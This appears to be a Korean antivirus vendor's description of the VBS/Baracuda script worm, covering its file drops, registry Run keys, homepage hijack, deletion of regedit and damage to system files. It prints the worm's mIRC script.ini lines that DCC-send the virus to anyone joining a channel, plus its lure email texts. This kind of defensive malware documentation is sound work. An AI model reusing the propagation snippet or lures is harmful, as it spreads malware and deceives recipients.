목록ㅣ 인쇄

VBS/Baracuda 바이러스 종류 Script Virus 실행환경 windows 발견일 - 제작지 위험등급 확산방법 바이러스 크기 첨부파일 Energy.vbs 메일제목 증상요약 치료방법 터보백신 제품군으로 치료 가능    이 바이러스를 실행하면 윈도우 폴더에 MSNetLog 와 윈도우 Command 폴더 에 Energy.vbs를 생성한다. 레지스트리에 아래와 같은 내용을 추가한다. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\Searc hMSN HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MSNet Log 시작 홈페이지를 "http://vx.dirtyhosting.com"로 바 꾼다. mirc 가 설치되어 있으면 script.ini 를 아래와 같이 바꾼다. [script] ;MIRC Script By Ahamad Boby n0=on 1:JOIN:#:{ n1= /if ( $nick == $me ) { halt } n2= /.dcc send $nick "&windir&"\Command\Energy.vbs n3=} 아웃룩의 주소록에 등록되어 있는 사용자들에게 아래 의 내용중의 하나와 함 께 Energy.vbs 를 첨부하여 보낸다 제목 : Surprise 본문 : A nice surprise for you, check it out... 제목 : Great... 본문 : Great app, check it out.. 제목 : Important, Please Read 본문 : A paper I downloaded from Symantec about new virus, you should read it 제목 : Happy Birthday 본문 : A happy birthday surprise 제목 : Take a look... 본문 : Take a look and the app that chenge to a pic 제목 : Great Joke.. Read it 본문 : Read this joke, it is so great... ha ha 레지스트리를 수정하지 못하도록 regedit.exe 파일을 지운다. 2 일 10 일 20 일 28 일에 notepad.exe 를 계속 실행 시킨다. 시스템 폴더에서 확장자가 sys, dll, ocx 인 파일을 찾아 손상시킨다. 무단전재ㆍ배포금지 - 에브리존에서 제공하는 모든 컨텐츠 정보에 대한 저작권은 에브리존의 소유이며 관련법의 보호를 받습니다. - 에브리존의 사전 허가 없이 에브리존 컨텐츠를 무단으로 전재, 배포를 금지되어 있습니다. - 이를 위반하는 경우 손해배상의 대상 또는 민.형사상의 법적 소송 대상이 될 수 있습니다. * 에브리존 정보 이용 문의 : greenking@everyzone.com